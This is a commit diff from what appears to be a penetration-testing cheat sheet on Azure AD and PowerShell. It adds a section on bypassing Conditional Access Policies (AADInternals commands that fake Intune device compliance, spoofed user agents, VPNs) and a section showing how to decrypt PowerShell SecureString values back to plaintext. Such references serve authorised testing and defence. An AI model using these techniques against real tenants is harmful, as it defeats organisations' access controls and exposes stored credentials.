Conditional Access Policy + PowerShell SecureString
parent
ad3877f1dc
commit
693a809664
|
@ -1,4 +1,4 @@
|
||||||
# Azure AD Tokens
|
# Azure AD - Tokens
|
||||||
|
|
||||||
## Connection
|
## Connection
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,62 @@
|
||||||
|
# Azure AD - Conditional Access Policy
|
||||||
|
|
||||||
|
Conditional Access is used to restrict access to resources to compliant devices only.
|
||||||
|
|
||||||
|
* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
|
||||||
|
|
||||||
|
| CAP | Bypass |
|
||||||
|
|---------------------------|---------|
|
||||||
|
| Location / IP ranges | Corporate VPN, Guest Wifi |
|
||||||
|
| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) |
|
||||||
|
| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) |
|
||||||
|
| Azure AD Joined Device | Try to join a VM (Work Access)|
|
||||||
|
| Compliant Device (Intune) | Fake device compliance |
|
||||||
|
| Device requirement | / |
|
||||||
|
| MFA | / |
|
||||||
|
| Legacy Protocols | / |
|
||||||
|
| Domain Joined | / |
|
||||||
|
|
||||||
|
|
||||||
|
## Bypassing CAP by faking device compliance
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# AAD Internals - Making your device compliant
|
||||||
|
# Get an access token for AAD join and save to cache
|
||||||
|
Get-AADIntAccessTokenForAADJoin -SaveToCache
|
||||||
|
# Join the device to Azure AD
|
||||||
|
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
|
||||||
|
# Marking device compliant - option 1: Registering device to Intune
|
||||||
|
# Get an access token for Intune MDM and save to cache (prompts for credentials)
|
||||||
|
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache
|
||||||
|
# Join the device to Intune
|
||||||
|
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
|
||||||
|
# Start the call back
|
||||||
|
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
|
||||||
|
```
|
||||||
|
|
||||||
|
## Bypassing CAP with device.trustType
|
||||||
|
|
||||||
|
The trustType property is an internal attribute that defines the relationship between the device and Azure AD.
|
||||||
|
When the condition of CAP is `device.trustType -eq "<TYPE>"`, the values can be:
|
||||||
|
|
||||||
|
* `AzureAD`: Azure AD joined devices
|
||||||
|
* `Workplace`: Azure AD registered devices
|
||||||
|
* `ServerAD`: Hybrid joined devices
|
||||||
|
|
||||||
|
|
||||||
|
## Bypassing CAP with user agent
|
||||||
|
|
||||||
|
There are several devices you can use to authenticate and interact with a service.
|
||||||
|
Try several `User-Agent` to get access to the resources:
|
||||||
|
|
||||||
|
* Windows: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100`
|
||||||
|
* Linux: `Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq`
|
||||||
|
* macOS: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq`
|
||||||
|
* Android: `Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.117 Mobile Safari/537.36`
|
||||||
|
* iOS: `Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1`
|
||||||
|
* WindowsPhone: `Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36`
|
||||||
|
|
||||||
|
|
||||||
|
## Bypassing CAP with location
|
||||||
|
|
||||||
|
Try different IP locations using a VPN.
|
|
@ -1,4 +1,4 @@
|
||||||
# Azure AD Connect
|
# Azure AD - Azure AD Connect
|
||||||
|
|
||||||
| Active Directory | Azure AD |
|
| Active Directory | Azure AD |
|
||||||
|-----------------------------------|-------------------|
|
|-----------------------------------|-------------------|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
# Azure AD IAM
|
# Azure AD - IAM
|
||||||
|
|
||||||
> Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource
|
> Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
# Azure AD Enumerate
|
# Azure AD - Enumerate
|
||||||
|
|
||||||
## Azure AD - Collectors
|
## Azure AD - Collectors
|
||||||
|
|
||||||
|
@ -199,43 +199,6 @@ Subdomain Service
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Conditional Access Policy
|
|
||||||
|
|
||||||
Conditional Access is used to restrict access to resources to compliant devices only.
|
|
||||||
|
|
||||||
* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
|
|
||||||
|
|
||||||
| CAP | Bypass |
|
|
||||||
|---------------------------|---------|
|
|
||||||
| Location / IP ranges | Corporate VPN, Guest Wifi |
|
|
||||||
| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) |
|
|
||||||
| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) |
|
|
||||||
| Azure AD Joined Device | Try to join a VM (Work Access)|
|
|
||||||
| Compliant Device (Intune) | Fake device compliance |
|
|
||||||
| Device requirement | / |
|
|
||||||
| MFA | / |
|
|
||||||
| Legacy Protocols | / |
|
|
||||||
| Domain Joined | / |
|
|
||||||
|
|
||||||
|
|
||||||
Bypassing conditional access by faking device compliance
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# AAD Internals - Making your device compliant
|
|
||||||
# Get an access token for AAD join and save to cache
|
|
||||||
Get-AADIntAccessTokenForAADJoin -SaveToCache
|
|
||||||
# Join the device to Azure AD
|
|
||||||
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
|
|
||||||
# Marking device compliant - option 1: Registering device to Intune
|
|
||||||
# Get an access token for Intune MDM and save to cache (prompts for credentials)
|
|
||||||
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache
|
|
||||||
# Join the device to Intune
|
|
||||||
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
|
|
||||||
# Start the call back
|
|
||||||
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Multi Factor Authentication
|
## Multi Factor Authentication
|
||||||
|
|
||||||
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
|
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
# Azure Persistence
|
# Azure AD - Persistence
|
||||||
|
|
||||||
## Add Secrets to Application
|
## Add Secrets to Application
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
# Azure AD Phishing
|
# Azure AD - Phishing
|
||||||
|
|
||||||
## Illicit Consent Grant
|
## Illicit Consent Grant
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
# Azure Requirements
|
# Azure - Requirements
|
||||||
|
|
||||||
## Pentest Requirements
|
## Pentest Requirements
|
||||||
|
|
||||||
|
|
|
@ -10,6 +10,7 @@
|
||||||
* [Just Enough Administration](#just-enough-administration)
|
* [Just Enough Administration](#just-enough-administration)
|
||||||
* [Contrained Language Mode](#constrained-language-mode)
|
* [Contrained Language Mode](#constrained-language-mode)
|
||||||
* [Script Block Logging](#script-block-logging)
|
* [Script Block Logging](#script-block-logging)
|
||||||
|
* [SecureString](#securestring)
|
||||||
* [Protected Process Light](#protected-process-light)
|
* [Protected Process Light](#protected-process-light)
|
||||||
* [Credential Guard](#credential-guard)
|
* [Credential Guard](#credential-guard)
|
||||||
* [Event Tracing for Windows](#event-tracing-for-windows)
|
* [Event Tracing for Windows](#event-tracing-for-windows)
|
||||||
|
@ -168,6 +169,37 @@ function Enable-PSScriptBlockLogging
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### SecureString
|
||||||
|
|
||||||
|
A `SecureString` in PowerShell is a data type designed to store sensitive information like passwords or confidential data in a more secure manner than a plain string. Unlike a regular string, which stores data in plain text and can be easily accessed in memory, a `SecureString` encrypts the data in memory, providing better protection against unauthorized access.
|
||||||
|
|
||||||
|
Convert to SecureString
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
$original = 'myPassword'
|
||||||
|
$secureString = ConvertTo-SecureString $original -AsPlainText -Force
|
||||||
|
$secureStringValue = ConvertFrom-SecureString $secureString
|
||||||
|
```
|
||||||
|
|
||||||
|
Get the original content
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
$secureStringBack = $secureStringValue | ConvertTo-SecureString
|
||||||
|
$bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureStringBack);
|
||||||
|
$finalValue = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr)
|
||||||
|
```
|
||||||
|
|
||||||
|
When a `SecureString` is created, the plain text characters are encrypted immediately using the Data Protection API (**DPAPI**)
|
||||||
|
|
||||||
|
Using the AES key
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
[Byte[]] $key = (49,222,...,87,159)
|
||||||
|
$pass = (echo "AA...AA=" | ConvertTo-SecureString -Key $key)
|
||||||
|
[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($pass))
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Protected Process Light
|
## Protected Process Light
|
||||||
|
|
||||||
Protected Process Light (PPL) is implemented as a Windows security mechanism that enables processes to be marked as "protected" and run in a secure, isolated environment, where they are shielded from attacks by malware or other unauthorized processes. PPL is used to protect processes that are critical to the operation of the operating system, such as anti-virus software, firewalls, and other security-related processes.
|
Protected Process Light (PPL) is implemented as a Windows security mechanism that enables processes to be marked as "protected" and run in a secure, isolated environment, where they are shielded from attacks by malware or other unauthorized processes. PPL is used to protect processes that are critical to the operation of the operating system, such as anti-virus software, firewalls, and other security-related processes.
|
||||||
|
|
Loading…
Reference in New Issue